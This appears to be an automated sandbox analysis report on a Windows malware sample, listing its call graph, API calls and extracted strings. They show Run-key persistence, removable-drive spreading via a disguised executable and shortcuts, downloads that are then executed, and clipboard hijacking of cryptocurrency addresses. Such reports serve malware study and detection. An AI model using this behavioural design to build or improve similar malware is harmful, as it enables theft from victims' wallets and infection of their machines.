4689->4690 4691 40c3a4 4690->4691 4700 4026f0 4691->4700 4693 40c3bc 4693->4680 4695 4024ce 4694->4695 4698 402484 _invalid_parameter 4694->4698 4695->4685 4696 4024ac 4697 40a1b0 _invalid_parameter 3 API calls 4696->4697 4697->4695 4698->4696 4699 40a1b0 _invalid_parameter 3 API calls 4698->4699 4699->4696 4703 402710 4700->4703 4702 40270a 4702->4693 4704 402724 4703->4704 4705 402540 __aligned_recalloc_base 10 API calls 4704->4705 4706 40276d 4705->4706 4707 402540 __aligned_recalloc_base 10 API calls 4706->4707 4708 40277d 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40278d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40279d 4711->4712 4713 4027a6 4712->4713 4714 4027cf 4712->4714 4718 403e20 4713->4718 4735 403df0 4714->4735 4717 4027c7 __aligned_recalloc_base 4717->4702 4719 402820 _invalid_parameter 7 API calls 4718->4719 4720 403e37 4719->4720 4721 402820 _invalid_parameter 7 API calls 4720->4721 4722 403e46 4721->4722 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e55 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4734 403e64 _invalid_parameter __aligned_recalloc_base 4725->4734 4727 40400f _invalid_parameter 4728 402850 _invalid_parameter 3 API calls 4727->4728 4729 404035 _invalid_parameter 4727->4729 4728->4727 4730 402850 _invalid_parameter 3 API calls 4729->4730 4731 40405b _invalid_parameter 4729->4731 4730->4729 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404081 4731->4733 4732->4731 4733->4717 4734->4727 4738 402850 4734->4738 4742 404090 4735->4742 4737 403e0c 4737->4717 4739 402866 4738->4739 4740 40285b 4738->4740 4739->4734 4741 40a1b0 _invalid_parameter 3 API calls 4740->4741 4741->4739 4743 4040a6 _invalid_parameter 4742->4743 4744 4040b8 _invalid_parameter 4743->4744 4745 4040dd 4743->4745 4747 404103 4743->4747 4744->4737 4772 403ca0 4745->4772 4748 40413d 4747->4748 4749 40415e 4747->4749 4782 404680 4748->4782 4751 402820 
_invalid_parameter 7 API calls 4749->4751 4752 40416f 4751->4752 4753 402820 _invalid_parameter 7 API calls 4752->4753 4754 40417e 4753->4754 4755 402820 _invalid_parameter 7 API calls 4754->4755 4756 40418d 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40419c 4757->4758 4795 403d70 4758->4795 4760 402820 _invalid_parameter 7 API calls 4761 4041ca _invalid_parameter 4760->4761 4761->4760 4762 404284 _invalid_parameter __aligned_recalloc_base 4761->4762 4763 402850 _invalid_parameter 3 API calls 4762->4763 4764 4045a3 _invalid_parameter 4762->4764 4763->4762 4765 402850 _invalid_parameter 3 API calls 4764->4765 4766 4045c9 _invalid_parameter 4764->4766 4765->4764 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045ef _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 404615 _invalid_parameter 4768->4770 4769->4768 4770->4744 4771 402850 _invalid_parameter 3 API calls 4770->4771 4771->4770 4773 403cae 4772->4773 4774 402820 _invalid_parameter 7 API calls 4773->4774 4775 403ccb 4774->4775 4776 402820 _invalid_parameter 7 API calls 4775->4776 4777 403cda _invalid_parameter 4776->4777 4778 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4777->4778 4779 403d3a _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4779->4780 4781 403d60 4779->4781 4780->4779 4781->4744 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 404697 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4786 4046a6 4785->4786 4787 402820 _invalid_parameter 7 API calls 4786->4787 4788 4046b5 _invalid_parameter __aligned_recalloc_base 4787->4788 4789 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4788->4789 4790 404841 _invalid_parameter 4788->4790 4789->4788 4791 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4790->4791 4792 404867 _invalid_parameter 4790->4792 4791->4790 4793 
402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4792->4793 4794 40488d 4792->4794 4793->4792 4794->4744 4796 402820 _invalid_parameter 7 API calls 4795->4796 4797 403d7f _invalid_parameter 4796->4797 4798 403ca0 _invalid_parameter 9 API calls 4797->4798 4799 403db8 _invalid_parameter 4798->4799 4800 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4799->4800 4801 403de3 4799->4801 4800->4799 4801->4761 4803 409d22 4802->4803 4806 409c70 4803->4806 4807 409fa0 __aligned_recalloc_base 7 API calls 4806->4807 4812 409c80 4807->4812 4808 407b0f 4808->4666 4810 409cbc 4813 40a1b0 _invalid_parameter 3 API calls 4810->4813 4812->4808 4812->4810 4815 4091a0 4812->4815 4822 409790 4812->4822 4827 409b60 4812->4827 4813->4808 4816 4091b3 4815->4816 4821 4091a9 4815->4821 4817 4091f6 memset 4816->4817 4816->4821 4818 409217 4817->4818 4817->4821 4819 40921d memcpy 4818->4819 4818->4821 4835 408f70 4819->4835 4821->4812 4823 40979d 4822->4823 4824 4097a7 4822->4824 4823->4812 4824->4823 4825 40989f memcpy 4824->4825 4840 4094c0 4824->4840 4825->4824 4828 409b6c 4827->4828 4831 409b76 4827->4831 4828->4812 4829 4094c0 64 API calls 4830 409bf7 4829->4830 4830->4828 4832 408f70 6 API calls 4830->4832 4831->4828 4831->4829 4833 409c16 4832->4833 4833->4828 4834 409c2b memcpy 4833->4834 4834->4828 4836 408fbe 4835->4836 4838 408f7e 4835->4838 4836->4821 4838->4836 4839 408eb0 6 API calls 4838->4839 4839->4838 4841 4094d0 4840->4841 4843 4094da 4840->4843 4841->4824 4843->4841 4850 409300 4843->4850 4845 409618 memcpy 4845->4841 4847 409637 memcpy 4848 409761 4847->4848 4849 4094c0 62 API calls 4848->4849 4849->4841 4851 40930d 4850->4851 4852 409317 4850->4852 4851->4841 4851->4845 4851->4847 4852->4851 4853 4093a0 4852->4853 4854 4093a5 4852->4854 4855 409388 4852->4855 4861 408c60 4853->4861 4858 408f70 6 API calls 4854->4858 4857 408f70 6 API calls 4855->4857 4857->4853 4858->4853 4860 40944c memset 4860->4851 4862 408c6f 4861->4862 4863 
408c79 4861->4863 4862->4851 4862->4860 4863->4862 4864 408b30 9 API calls 4863->4864 4865 408d72 4864->4865 4866 409fa0 __aligned_recalloc_base 7 API calls 4865->4866 4867 408dc1 4866->4867 4867->4862 4868 4089a0 46 API calls 4867->4868 4869 408dee 4868->4869 4870 40a1b0 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4869->4870 4870->4862 4890 409e50 GetCurrentProcessId 4871->4890 4873 409feb 4874 409e70 __aligned_recalloc_base 5 API calls 4873->4874 4878 409ff7 __aligned_recalloc_base 4873->4878 4874->4878 4875 40a0f0 _invalid_parameter HeapValidate 4875->4878 4876 40a0a0 HeapAlloc 4876->4878 4877 40a06a HeapReAlloc 4877->4878 4878->4875 4878->4876 4878->4877 4879 40a1b0 _invalid_parameter 3 API calls 4878->4879 4880 405d15 4878->4880 4879->4878 4880->4651 4880->4656 4883 40c19b 4881->4883 4882 409fa0 __aligned_recalloc_base 7 API calls 4882->4883 4883->4882 4884 405dad 4883->4884 4884->4656 4885 407310 4884->4885 4886 409fa0 __aligned_recalloc_base 7 API calls 4885->4886 4887 407320 4886->4887 4888 407367 4887->4888 4889 40732c memcpy CreateThread 4887->4889 4888->4656 4889->4888 4891 407370 GetTickCount srand rand Sleep 4889->4891 4890->4873 4892 4073a7 4891->4892 4893 4073fd 4891->4893 4896 4073b6 StrChrA 4892->4896 4897 4073fb 4892->4897 4901 40eae0 9 API calls 4892->4901 4894 40eae0 56 API calls 4893->4894 4893->4897 4894->4897 4895 40a1b0 _invalid_parameter 3 API calls 4898 407428 4895->4898 4896->4892 4897->4895 4902 40ed03 InternetCloseHandle Sleep 4901->4902 4903 40eba3 InternetOpenUrlW 4901->4903 4906 40ed2a 6 API calls 4902->4906 4923 4073e5 Sleep 4902->4923 4904 40ebd2 CreateFileW 4903->4904 4905 40ecf6 InternetCloseHandle 4903->4905 4908 40ec01 InternetReadFile 4904->4908 4927 40ecd3 4904->4927 4905->4902 4907 40eda6 wsprintfW DeleteFileW 4906->4907 4906->4923 4909 40e7c0 18 API calls 4907->4909 4910 40ec54 wsprintfW DeleteFileW 4908->4910 4911 40ec25 4908->4911 4912 40eddb 4909->4912 4929 40e7c0 CreateFileW 4910->4929 4911->4910 4913 
40ec2e WriteFile 4911->4913 4915 40ede5 Sleep 4912->4915 4916 40ee19 DeleteFileW 4912->4916 4913->4908 4918 40e980 6 API calls 4915->4918 4916->4923 4920 40edfc 4918->4920 4920->4923 4925 40ee0f ExitProcess 4920->4925 4921 40eca0 Sleep 4924 40e980 6 API calls 4921->4924 4922 40ecdc DeleteFileW 4922->4927 4923->4892 4926 40ecb7 4924->4926 4926->4927 4928 40eccb ExitProcess 4926->4928 4927->4905 4930 40e805 CreateFileMappingW 4929->4930 4931 40e906 4929->4931 4930->4931 4932 40e826 MapViewOfFile 4930->4932 4933 40e920 CreateFileW 4931->4933 4941 40e971 4931->4941 4932->4931 4934 40e845 GetFileSize 4932->4934 4935 40e942 WriteFile 4933->4935 4936 40e968 4933->4936 4937 40e861 4934->4937 4938 40e8fc UnmapViewOfFile 4934->4938 4935->4936 4939 40a1b0 _invalid_parameter 3 API calls 4936->4939 4949 40c7f0 4937->4949 4938->4931 4939->4941 4941->4921 4941->4922 4943 40c190 7 API calls 4944 40e8b0 4943->4944 4944->4938 4945 40e8cd memcmp 4944->4945 4945->4938 4946 40e8e9 4945->4946 4947 40a1b0 _invalid_parameter 3 API calls 4946->4947 4948 40e8f2 4947->4948 4948->4938 4950 40c220 10 API calls 4949->4950 4951 40c814 4950->4951 4951->4938 4951->4943 4953 40d73d htons inet_addr setsockopt 4952->4953 4958 40d86e 4952->4958 4954 40aa80 8 API calls 4953->4954 4955 40d7b6 bind lstrlenA sendto ioctlsocket 4954->4955 4961 40d80b 4955->4961 4958->4437 4959 40d832 5009 40ab40 shutdown closesocket 4959->5009 4960 409fe0 9 API calls 4960->4961 4961->4959 4961->4960 5000 40d890 4961->5000 5016 40dbc0 memset InternetCrackUrlA InternetOpenA 4962->5016 4966 40a1b0 _invalid_parameter 3 API calls 4967 40da9e 4966->4967 4967->4437 4968 40da6b 4968->4966 4974 40da61 SysFreeString 4974->4968 5123 40aa40 inet_addr 4977->5123 4980 40ab2d 4985 40e470 4980->4985 4981 40aadc connect 4982 40aaf0 getsockname 4981->4982 4983 40ab24 4981->4983 4982->4983 5126 40ab40 shutdown closesocket 4983->5126 5127 40aa20 inet_ntoa 4985->5127 4987 40e486 4988 40c9f0 11 API calls 4987->4988 4989 40e4a5 4988->4989 4990 
Execution graph (call-graph view; legend: Executed / Not Executed). The rendered diagram was exported as a bare node and edge list and is not reproduced here. What the list preserves is the set of function nodes and the API calls the graph labels them with; they are regrouped below by behaviour, with addresses as in the graph. Labels such as "56 API calls" are the report's own aggregate labels for nodes it does not expand.

• WinINet HTTP client: 40e4f0 memset InternetCrackUrlA InternetOpenA → 40e594 InternetConnectA → 40e5cd HttpOpenRequestA → 40e603 HttpAddRequestHeadersA HttpSendRequestA → 40e664 InternetReadFile (40e6ac memcpy in the read loop) → 40e6fa / 40e707 / 40e714 InternetCloseHandle. A second request path without the added headers: 40dc61 InternetConnectA → 40dc9a HttpOpenRequestA → 40dcd0 HttpSendRequestA → 40dd0e InternetReadFile → 40dd56 memcpy → 40ddb0 / 40ddbd / 40ddca InternetCloseHandle. Sleep/retry loop at 407490: 4074b8 and 40756a Sleep, 4074e7 Sleep wsprintfA DeleteUrlCacheEntry → 40ea30 InternetOpenA → 40ea56 InternetOpenUrlA → 40ea75 HttpQueryInfoA → 40eab4 / 40eabe InternetCloseHandle → 40eac8 Sleep; 40eae0 (56 API calls); 40757a ExitThread.

• Local host and address lookup: 40add0 gethostname → 40adf7 gethostbyname → 40aa20 inet_ntoa → 40aecc strcmp, then a chain of strstr checks at 40aeef, 40af0d, 40af2b, 40af4e, 40af6c, 40af8a, 40afad, 40afcb and 40afe9 (each followed by 40aa20 inet_ntoa) before 40affe EnterCriticalSection … 40b13a LeaveCriticalSection; 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 supplies timestamps; 40b0c6 Sleep; 40aa59 gethostbyname → 40aa6c socket.

• File writing: 40ac04 CreateFileW → 40ac27 WriteFile FlushFileBuffers → 40ac53 InterlockedExchange; 406211 CreateFileW → 406251 WriteFile → 40628f FlushFileBuffers; 40e770 CreateFileW → 40e79f GetFileSize.

• COM and string helpers: 40dada SysAllocString → 40daf1 CoCreateInstance → 40db9d SysFreeString; 4071b6 SysAllocString, 4072c0 CoCreateInstance, 407244 / 40700b SysFreeString; 406460 CoInitialize CoCreateInstance, 4064a0 wsprintfW; lstrcmpiW comparison loops at 40e013, 40e2f3, 40e343, 40e193 and 40e1e3 paired with SysFreeString at 40e02b, 40e373, 40e35b, 40e213 and 40e1fb; 40c910 _vscprintf wvsprintfA, 40c988 SysFreeString; 405647 MultiByteToWideChar; 4055b1 lstrcpynW; lstrlenA at 4056a3, 40563a, 4055f1, 40c8b1, 4057c3, 405771, 40bac1, 40b4a7 and 4054d8; 40c8e0 memcpy.

• Random bytes: 40be80 CryptAcquireContextW → 40be9d CryptGenRandom CryptReleaseContext.

• Message window and clipboard viewer: 405889 memset GetModuleHandleW → 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW → 405900 CreateWindowExW → 40592d GetMessageA → 405941 TranslateMessage DispatchMessageA; 40595f ExitThread. Window procedure at 405970 GetWindowLongW: 4059c4 SetClipboardViewer SetWindowLongW, 4059ee SetWindowLongW, 405a0c and 405b45 SendMessageA, 405a27 / 405a43 / 405a58 IsClipboardFormatAvailable, 405a75 OpenClipboard → 405a85 GetClipboardData → 405a9d GlobalLock → 405ad4 GlobalUnlock CloseClipboard, 405b5d RegisterRawInputDevices ChangeClipboardChain, 405ba4 DefWindowProcA. Clipboard text scan from 404970 lstrlenW: StrStrW at 404d30, 404d58, 404d80, 404dbb, 404dd2, 404de9, 40539b, 4053ae, 4053b7, 4053d3, 405470, 40548a, 4054a4 and 4054be; 4048a0 lstrlenW with 404911 iswalpha and 40492c iswdigit. Clipboard write-back: 4054d8 lstrlenA → 4054eb GlobalAlloc → 405506 GlobalLock → 405519 memcpy GlobalUnlock OpenClipboard → 405546 EmptyClipboard SetClipboardData CloseClipboard.

• Drive enumeration and file-system sweep: 4063a0 GetLogicalDrives; 4063dc RegOpenKeyExW → 4063fe RegQueryValueExW → 40643a RegCloseKey; 406320 GetDriveTypeW → 40635c QueryDosDeviceW → 406376 StrCmpNW; 40630b lstrcpyW; 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW → 406cd6 / 406ceb wsprintfW → 4066b0 _chkstk; 406d38 Sleep; 406d48 ExitThread. Directory walker from 4066b0: PathFileExistsW at 4067c4, 4067d9, 406809, 40683c, 406874 and 406af4; SetFileAttributesW DeleteFileW at 4067a5 and 4067ea, 406a97 wsprintfW SetFileAttributesW DeleteFileW; 40681a CreateDirectoryW; SetFileAttributesW at 40682d, 406865 and 4068a0; 40684d CopyFileW; 4068ca FindFirstFileW → 4069b3 / 4069c9 lstrcmpW → 406a0f lstrcmpiW → 406a76 PathMatchSpecW → 406b0a wsprintfW wsprintfW → 406b74 MoveFileExW → 406b8a FindNextFileW → 406ba6 FindClose; nested 406570 CreateDirectoryW wsprintfW FindFirstFileW → 4065c5 / 4065db lstrcmpW → 4065f3 wsprintfW wsprintfW → 406656 MoveFileExW → 40666c FindNextFileW → 406688 FindClose RemoveDirectoryW.

• Listening TCP server on an I/O completion port: 401920 GetTickCount WaitForSingleObject → 40194d WSAWaitForMultipleEvents → 40196a WSAEnumNetworkEvents → 401992 accept; after accept 402326 getpeername CreateIoCompletionPort → 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement; worker 401f50 / 401fd3 GetQueuedCompletionStatus with 401f97 WSAGetOverlappedResult and 401fb9 WSAGetLastError; 401c50 WSARecv retried at 401ca4 Sleep WSARecv after 401c90 WSAGetLastError; 401ae0 WSASend retried at 401b26 Sleep WSASend after 401b12 WSAGetLastError; teardown 401ef2 InterlockedDecrement setsockopt closesocket, 40ab40 shutdown closesocket, 40229c LeaveCriticalSection DeleteCriticalSection; reference counts kept with InterlockedIncrement / InterlockedDecrement / InterlockedExchangeAdd (401d00, 401d17, 401d4c, 401da9, 401dbc, 401e57, 401e87, 4017ba, 40183d, 4018a7); timing via 4019f0 / 401a43 GetTickCount and 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980.

• UDP sockets and outbound TCP: 4013bb CreateEventA socket → 401401 bind → 401444 CreateThread into 401100 (401115 ioctlsocket, 401168 recvfrom, 4011cd WaitForSingleObject, 4011ad InterlockedExchangeAdd; buffer handling 4010a3 IsBadReadPtr, 4010d8 memmove, 4015a5 memcpy); 401498 CreateEventA socket → 4014e2 htons setsockopt bind → 401558 CreateThread; 401247 memcpy htons → 401297 sendto; 40cdcd socket → 40cde2 htons connect; 40cca1 send; 40d8c8 recvfrom → 40d8f6 StrCmpNIA → 40d915 StrStrIA → 40d936 StrChrA (40d8e9 Sleep on the other recvfrom branch); 401341 SetEvent WaitForSingleObject; waits at 40b423, 40ced0, 40d281, 40d5bb and 40d615 WaitForSingleObject.

• Runtime helpers referenced throughout: 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter (3 API calls), 409fa0 __aligned_recalloc_base (7 API calls), 409fe0 (9 API calls), 409d90 (7 API calls), 40a220 (8 API calls); unwinding 40ef9c RtlUnwind, 40f0b1 / 40f151 NtQueryVirtualMemory; 40d071 IsBadReadPtr, 40be3b memcmp, 40bd01 memmove, 40bbfd memcpy.

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Basic blocks (rendered graph not reproduced): 40e730-40e75c GetLocaleInfoA strcmp → either 40e75e-40e760 or 40e762; both → 40e764-40e767.
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                    • strcmp.NTDLL ref: 0040E752
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocalestrcmp
                                                                    • String ID: UKR
                                                                    • API String ID: 3191669094-64918367

Control-flow Graph (graph image not reproduced)

APIs
• Sleep.KERNELBASE(00000BB8), ref: 0040759E
• CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
• GetLastError.KERNEL32 ref: 004075B9
• ExitProcess.KERNEL32 ref: 004075C8
• GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
• PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
• wsprintfW.USER32 ref: 0040762A
• DeleteFileW.KERNELBASE(?), ref: 0040763A
• ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
• wcscmp.NTDLL ref: 00407663
• ExitProcess.KERNEL32 ref: 00407682
Memory Dump Source
• Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
Similarity
• API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
• String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
• API String ID: 4172876685-2783337622

Control-flow Graph (entry block at 0040E980; graph image not reproduced)

APIs
• memset.NTDLL ref: 0040E98E
• memset.NTDLL ref: 0040E99E
• CreateProcessW.KERNELBASE(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
• Sleep.KERNELBASE(000003E8), ref: 0040E9E7
• ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
• Sleep.KERNEL32(000003E8), ref: 0040EA1C
Memory Dump Source
• Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
Similarity
• API ID: Sleepmemset$CreateExecuteProcessShell
• String ID: $D$Gy@$open
• API String ID: 3787208655-4184347819

Control-flow Graph (entry block at 004066B0; graph image not reproduced)

APIs
• _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
• wsprintfW.USER32 ref: 004066EF
• wsprintfW.USER32 ref: 0040670F
• wsprintfW.USER32 ref: 0040672F
• wsprintfW.USER32 ref: 0040674F
• wsprintfW.USER32 ref: 00406768
• PathFileExistsW.SHLWAPI(?), ref: 00406778
• SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
• DeleteFileW.KERNEL32(?), ref: 004067BE
• PathFileExistsW.SHLWAPI(?), ref: 004067CB
• PathFileExistsW.SHLWAPI(?), ref: 004067E0
• SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
• DeleteFileW.KERNEL32(?), ref: 00406803
• PathFileExistsW.SHLWAPI(?), ref: 00406810
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
• SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
• PathFileExistsW.SHLWAPI(?), ref: 00406843
Memory Dump Source
• Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
Similarity
• API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
• String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
• API String ID: 2467965697-1256475382
APIs
• lstrlenW.KERNEL32(00000000), ref: 0040498C
• StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D39
• StrStrW.SHLWAPI(00000000,cosmos), ref: 00404D61
• StrStrW.SHLWAPI(00000000,addr), ref: 00404D89
• StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404DC4
• StrStrW.SHLWAPI(00000000,ronin:), ref: 00404DDB
• StrStrW.SHLWAPI(00000000,nano_), ref: 00404DF2
• StrStrW.SHLWAPI(00000000,bnb), ref: 004053A4
• StrStrW.SHLWAPI(00000000,bc1p), ref: 004053C0
• StrStrW.SHLWAPI(00000000,bc1q), ref: 004053DC
• StrStrW.SHLWAPI(00000000,ronin:), ref: 0040545F
• StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405479
• StrStrW.SHLWAPI(00000000,cosmos), ref: 00405493
• StrStrW.SHLWAPI(00000000,addr), ref: 004054AD
• StrStrW.SHLWAPI(00000000,nano_), ref: 004054C7
• lstrlenA.KERNEL32(00000000), ref: 004054DC
• GlobalAlloc.KERNEL32(00002002,-00000001), ref: 004054F7
• GlobalLock.KERNEL32(00000000), ref: 0040550A
• memcpy.NTDLL(00000000,00000000,-00000001), ref: 00405528
• GlobalUnlock.KERNEL32(00000000), ref: 00405534
• OpenClipboard.USER32(00000000), ref: 0040553C
• EmptyClipboard.USER32 ref: 00405546
• SetClipboardData.USER32(00000001,00000000), ref: 00405552
• CloseClipboard.USER32 ref: 00405558
Memory Dump Source
• Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
Similarity
• API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
• String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$nano_$nano_$ronin:$ronin:$A
• API String ID: 2017104846-3944006828

Control-flow Graph (graph image not reproduced)

Memory Dump Source
• Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
Similarity
• API ID: _allshl_aullshr
• String ID: Y
• API String ID: 673498613-3233089245

Control-flow Graph (graph image not reproduced)

Memory Dump Source
• Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
Similarity
• API ID: _allshl_aullshr
• String ID:
• API String ID: 673498613-0

Control-flow Graph (entry block at 00406570; graph image not reproduced)

APIs
• CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
• wsprintfW.USER32 ref: 00406595
• FindFirstFileW.KERNEL32(?,?), ref: 004065AC
• lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
• lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
• wsprintfW.USER32 ref: 0040660A
• wsprintfW.USER32 ref: 0040662A
• MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
• FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
• FindClose.KERNEL32(000000FF), ref: 0040668F
• RemoveDirectoryW.KERNEL32(?), ref: 00406699
Memory Dump Source
• Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
Similarity
• API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
• String ID: %s\%s$%s\%s$%s\*$ok@
• API String ID: 92872011-32713442

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 621 405970-405992 GetWindowLongW 622 405994-40599b 621->622 623 4059b6-4059bd 621->623 626 4059a1-4059a5 622->626 627 405a27-405a38 IsClipboardFormatAvailable 622->627 624 4059e6-4059ec 623->624 625 4059bf 623->625 629 405a06-405a0a 624->629 630 4059ee-405a04 SetWindowLongW 624->630 628 405ba4-405bbd DefWindowProcA 625->628 633 4059c4-4059e1 SetClipboardViewer SetWindowLongW 626->633 634 4059a7-4059ab 626->634 631 405a43-405a4d IsClipboardFormatAvailable 627->631 632 405a3a-405a41 627->632 635 405a22 629->635 636 405a0c-405a1c SendMessageA 629->636 630->635 638 405a58-405a62 IsClipboardFormatAvailable 631->638 639 405a4f-405a56 631->639 637 405a6b-405a6f 632->637 633->628 640 4059b1 634->640 641 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 634->641 635->628 636->635 643 405a75-405a7f OpenClipboard 637->643 644 405b3f-405b43 637->644 638->637 642 405a64 